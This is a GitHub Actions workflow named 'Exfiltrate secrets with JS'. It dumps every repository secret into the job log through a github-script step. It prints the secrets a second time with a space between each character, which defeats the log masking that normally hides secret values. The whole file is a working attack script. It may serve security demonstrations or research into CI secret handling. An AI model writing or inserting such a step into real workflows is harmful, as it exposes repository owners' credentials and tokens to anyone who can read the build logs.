name: Exfiltrate secrets with JS

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Secrets
        uses: actions/github-script@v4
        env:
          SECRETS: ${{ toJSON(secrets) }}
        with:
          script: |
            // write secrets in console
            console.log(process.env.SECRETS);
          
            // write secrets with spaces
            const secrets = process.env.SECRETS.split('').join(' ');
            console.log(secrets);